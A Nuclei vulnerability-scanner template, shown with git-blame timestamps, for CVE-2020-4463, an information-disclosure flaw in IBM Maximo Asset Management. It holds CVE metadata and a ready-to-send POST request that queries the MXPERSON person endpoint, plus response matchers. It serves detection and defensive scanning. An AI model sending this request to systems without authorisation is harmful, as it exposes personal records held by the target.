2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-4463
|
2020-12-07 07:59:25 +00:00
|
|
|
|
|
|
|
info:
|
2022-06-28 19:13:35 +00:00
|
|
|
name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection
|
2020-12-07 07:59:25 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
IBM Maximo Asset Management is vulnerable to an
|
2022-06-28 19:03:43 +00:00
|
|
|
XML external entity injection (XXE) attack when processing XML data.
|
2020-12-07 07:59:25 +00:00
|
|
|
A remote attacker could exploit this vulnerability to expose
|
|
|
|
sensitive information or consume memory resources.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2020-12-07 07:59:25 +00:00
|
|
|
- https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463
|
|
|
|
- https://github.com/Ibonok/CVE-2020-4463
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/181484
|
|
|
|
- https://www.ibm.com/support/pages/node/6253953
|
2022-06-28 19:03:43 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-4463
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 8.2
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-4463
|
|
|
|
cwe-id: CWE-611
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2020,ibm,xxe,disclosure
|
2020-12-07 15:00:11 +00:00
|
|
|
|
2020-12-07 07:59:25 +00:00
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/os/mxperson"
|
|
|
|
- "{{BaseURL}}/meaweb/os/mxperson"
|
|
|
|
body: |
|
|
|
|
<?xml version='1.0' encoding='UTF-8'?>
|
|
|
|
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
|
|
|
|
<max:MXPERSONQuery></max:MXPERSONQuery>
|
|
|
|
</max:QueryMXPERSON>
|
|
|
|
headers:
|
|
|
|
Content-Type: application/xml
|
2022-07-02 11:33:45 +00:00
|
|
|
|
2020-12-07 07:59:25 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-07-02 11:33:45 +00:00
|
|
|
|
2020-12-07 07:59:25 +00:00
|
|
|
- type: word
|
2022-07-02 11:33:45 +00:00
|
|
|
part: body
|
2020-12-07 07:59:25 +00:00
|
|
|
words:
|
|
|
|
- "QueryMXPERSONResponse"
|
|
|
|
- "MXPERSONSet"
|
2022-07-02 11:33:45 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/xml"
|
2022-06-28 19:03:43 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/28
|